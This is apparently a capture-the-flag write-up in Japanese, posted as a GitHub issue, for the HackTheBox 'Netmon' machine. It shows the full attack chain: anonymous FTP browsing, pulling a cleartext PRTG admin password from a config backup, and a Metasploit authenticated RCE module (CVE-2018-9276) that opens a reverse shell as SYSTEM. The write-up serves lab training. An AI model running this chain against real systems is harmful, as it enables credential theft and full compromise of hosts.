search

roaris / ctf-log

0 stars 0 forks source link

HackTheBox: Netmon (Machine Easy) #5

Open roaris opened 6 months ago

roaris commented 6 months ago

https://app.hackthebox.com/machines/Netmon

$ nmap -sC -sV -Pn 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 22:10 JST
Nmap scan report for 10.10.10.152
Host is up (0.49s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_11-10-23  09:20AM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2024-02-23T13:11:22
|_  start_date: 2024-02-23T13:08:29

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.98 seconds
roaris commented 6 months ago

Anonymous FTP login allowed (FTP code 230)とあるので試す

$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:roaris): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49878|)
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
11-10-23  09:20AM       <DIR>          Windows
226 Transfer complete.
roaris commented 6 months ago

/Users/Public/Desktop/user.txtがあるのを見つけた Desktopまでいかないとget出来ないのね...

ftp> get Users/Public/Desktop/user.txt
local: Users/Public/Desktop/user.txt remote: Users/Public/Desktop/user.txt
ftp: Can't access `Users/Public/Desktop/user.txt': No such file or directory
ftp> cd Users/Public
250 CWD command successful.
ftp> cd Desktop
250 CWD command successful.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||49921|)
150 Opening ASCII mode data connection.
100% |*****************************************|    34        0.08 KiB/s    00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.05 KiB/s)
roaris commented 6 months ago

/Users/Administratorにはアクセスできない

ftp> dir Users/Administrator
229 Entering Extended Passive Mode (|||49890|)
550 Access is denied.
roaris commented 6 months ago

ポート80をブラウザで確認すると、PRTG Network Monitorというアプリケーションのログイン画面が出てきた SecListsを確認したが、ヒットせず

$ find /usr/share/SecLists -iname *prtg*

default credentialがprtgadmin / prtgadminと出てきたので、これも試すが駄目だった

roaris commented 6 months ago

FTP側をもう少し見てみる

https://e-words.jp/w/.lnk%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB.html .InkはWindowsのショートカットファイルらしい

ftp> dir Users/Public/Desktop
229 Entering Extended Passive Mode (|||50103|)
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1195 PRTG Enterprise Console.lnk
02-02-19  11:18PM                 1160 PRTG Network Monitor.lnk
02-23-24  08:09AM                   34 user.txt
226 Transfer complete.

Program Files (x86)/PRTG Network Monitor を見ても、ログインに繋がるような情報が見つからない

ftp> dir Program\ Files\ (x86)/PRTG\ Network\ Monitor
229 Entering Extended Passive Mode (|||50361|)
125 Data connection already open; Transfer starting.
02-02-19  11:17PM       <DIR>          64 bit
02-02-19  11:15PM                 1888 activation.dat
02-02-19  11:18PM       <DIR>          cert
12-14-17  12:40PM              2461696 chartdir51.dll
12-14-17  12:40PM              9077248 ChilkatDelphiXE.dll
12-14-17  12:40PM              2138986 chrome.pak
02-02-19  11:17PM       <DIR>          Custom Sensors
12-14-17  12:40PM               382464 dbexpmda40.dll
12-14-17  12:40PM               519680 dbexpoda40.dll
12-14-17  12:40PM               377856 dbexpsda40.dll
12-14-17  12:40PM                 5681 defaultmaps.xml
12-14-17  12:40PM                12871 defaultmaps_iad.xml
02-13-18  02:08PM                 1224 deviceiconlist.txt
02-02-19  11:17PM       <DIR>          devicetemplates
02-23-24  08:08AM       <DIR>          dlltemp
02-02-19  11:18PM       <DIR>          download
12-14-17  12:40PM                 6667 ethertype.txt
12-14-17  12:40PM                 6218 FlowRules.osr
02-02-19  11:18PM       <DIR>          helperlibs
12-14-17  12:40PM              9956864 icudt.dll
12-14-17  12:40PM                 1665 ipmi_bsd-2.0.txt
02-02-19  11:16PM       <DIR>          language
12-14-17  12:40PM              3707349 Lb2to3.exe
12-14-17  12:40PM             24978944 libcef.dll
12-14-17  12:40PM              1412096 libeay32.dll
02-02-19  11:17PM       <DIR>          locales
02-02-19  11:18PM       <DIR>          lookups
02-16-18  10:03AM               796566 macmanufacturerlist.txt
02-02-19  11:18PM       <DIR>          MIB
12-14-17  12:40PM                  522 Microsoft.VC80.CRT.manifest
12-14-17  12:40PM               421200 msvcp100.dll
12-14-17  12:40PM               770384 msvcr100.dll
12-14-17  12:40PM               630544 msvcr80.dll
12-14-17  12:40PM                12498 netsnmp-license.txt
02-02-19  11:17PM       <DIR>          Notifications
12-14-17  12:40PM                    0 Npgsql.txt
12-14-17  12:40PM               487936 openssl.exe
01-18-18  10:03AM               177152 paelibssh.dll
12-14-17  12:40PM                35088 paesslerchart.dll
12-14-17  12:40PM              1083904 PaesslerSNMP.dll
02-15-18  04:24PM              1074688 PaesslerSNMPWrapper.dll
12-14-17  12:40PM               421160 PaesslerSQLEngine.dll
12-14-17  12:40PM               193832 PaesslerSQLEngineDBX.dll
12-14-17  12:40PM               331536 paesslerVMWareShell.exe
12-14-17  12:40PM               310032 paesslerVMWareShell.vshost.exe
12-14-17  12:40PM                 1429 phantomjs-license.bsd
12-14-17  12:40PM                 1428 protocol.txt
02-16-18  10:04AM              6379096 PRTG Administrator.exe
02-16-18  10:05AM             12923480 PRTG Enterprise Console.exe
02-16-18  10:04AM              5439576 PRTG GUI Starter.exe
02-02-19  11:17PM       <DIR>          PRTG Installer Archive
02-16-18  10:05AM             11647576 PRTG Probe.exe
02-16-18  10:05AM              7026776 PRTG Server.exe
02-02-19  11:18PM              2000256 PRTG Setup Log.log
02-02-19  11:17PM       <DIR>          prtg-installer-for-distribution
12-14-17  12:40PM               300318 prtg.ico
12-14-17  12:40PM               444640 PrtgDllWrapper.exe
02-16-18  10:04AM              2778200 PRTGProbeUpdate.exe
02-16-18  10:04AM              3227224 PrtgRemoteInstall.exe
02-16-18  10:04AM              2782808 PRTGServerUpdate.exe
02-16-18  10:04AM              2104408 PRTG_Chromium_Helper.exe
02-16-18  10:04AM              2264664 PRTG_IE_Helper.exe
02-02-19  11:17PM       <DIR>          Python34
02-16-18  10:04AM              1012224 RegWrapper.exe
02-02-19  11:17PM       <DIR>          Sensor System
02-02-19  11:17PM       <DIR>          snmplibs
02-02-19  11:18PM       <DIR>          snmptemp
01-18-18  10:03AM               461824 ssh.dll
12-14-17  12:40PM               384512 ssleay32.dll
02-02-19  11:18PM       <DIR>          themes
02-02-19  11:18PM              1275563 unins000.dat
02-02-19  11:15PM              1498815 unins000.exe
12-14-17  12:40PM              1163024 VimService2005.dll
12-14-17  12:40PM              4312848 VimService2005.XmlSerializers.dll
02-02-19  11:17PM       <DIR>          webroot
226 Transfer complete.
roaris commented 6 months ago

prtg network monitor configuration locationで検索すると、 https://kb.paessler.com/en/topic/89431-how-to-copy-data-files-and-custom-files-from-prtg-data-directory#:~:text=The%20PRTG%20Data%20folder%20by,configuration%20of%20your%20PRTG%20server.

The PRTG Data folder by default located under "C:\ProgramData\Paessler\PRTG Network Monitor" contains all the monitoring data (logs, historic data, tickets, reports, etc.) as well as the configuration of your PRTG server. The content of this folder must be copied on the new server (in the same folder) if you want to keep this data.

と出てくる

ftp> dir
229 Entering Extended Passive Mode (|||50542|)
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
11-10-23  09:20AM       <DIR>          Windows
226 Transfer complete.

ルートでdirをしてもProgramDataなんて出てこないのに、あるらしい

ftp> dir ProgramData/Paessler/PRTG\ Network\ Monitor
229 Entering Extended Passive Mode (|||50430|)
125 Data connection already open; Transfer starting.
08-18-23  07:20AM       <DIR>          Configuration Auto-Backups
02-23-24  08:09AM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
02-23-24  08:09AM       <DIR>          Logs (Web Server)
02-23-24  08:14AM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
02-23-24  08:50AM              1680940 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
roaris commented 6 months ago

PRTG Configuration.dat, PRTG Configuration.old, PRTG Configuration.old.bakの3つをダウンロードして確認する 全てXMLファイルだった

passwordで検索をかけると、PRTG Configuration.old.bakに、prtgadminのパスワードがPrTg@dmin2018であるという情報が書かれていた

roaris commented 6 months ago

しかし、old.bakとあるように、過去の設定のバックアップファイルなので、prtgadmin / PrTg@dmin2018でログインすることは出来ない

2018年に設定したパスワードっぽいので、prtgadmin / PrTg@dmin2019を試すが、これでもいけない

writeupを見ても、prtgadmin / PrTg@dmin2019で正しいらしいのだが...

roaris commented 6 months ago

Machineを再起動したら、prtgadmin / PrTg@dmin2019 でログインできた 意味不明すぎるだろ...

roaris commented 6 months ago

ざっとページを眺めたが、特にフラグは見当たらない バージョン18.1.37.13946とある

prtg 18.1.37 exploitで検索すると、コマンドインジェクションの脆弱性(CVE-2018-9276)があると出てきた

roaris commented 6 months ago

exploit/windows/http/prtg_authenticated_rce を試す

msf6 > search prtg

Matching Modules
================

   #  Name                                                        Disclosure Date  Rank       Check  Description
   -  ----                                                        ---------------  ----       -----  -----------
   0  exploit/windows/http/prtg_authenticated_rce_cve_2023_32781  2023-08-09       excellent  Yes    PRTG CVE-2023-32781 Authenticated RCE
   1  exploit/windows/http/prtg_authenticated_rce                 2018-06-25       excellent  Yes    PRTG Network Monitor Authenticated RCE

Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/prtg_authenticated_rce
roaris commented 6 months ago

shellと打つとシェルが起動する

msf6 exploit(windows/http/prtg_authenticated_rce) > set ADMIN_PASSWORD PrTg@dmin2019
ADMIN_PASSWORD => PrTg@dmin2019
msf6 exploit(windows/http/prtg_authenticated_rce) > set RHOSTS 10.10.10.152
RHOSTS => 10.10.10.152
msf6 exploit(windows/http/prtg_authenticated_rce) > set LHOST 10.10.16.3
LHOST => 10.10.16.3
msf6 exploit(windows/http/prtg_authenticated_rce) > exploit

[*] Started reverse TCP handler on 10.10.16.3:4444
[+] Successfully logged in with provided credentials
[+] Created malicious notification (objid=2018)
[+] Triggered malicious notification
[+] Deleted malicious notification
[*] Waiting for payload execution.. (30 sec. max)
[*] Sending stage (176198 bytes) to 10.10.10.152
[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.152:50022) at 2024-02-23 23:41:35 +0900

meterpreter > shell
Process 3064 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

root.txtを見つけて終わり

C:\>dir /s root.txt
dir /s root.txt
 Volume in drive C has no label.
 Volume Serial Number is 0EF5-E5E5

 Directory of C:\Users\Administrator\Desktop

02/23/2024  09:26 AM                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   6,723,411,968 bytes free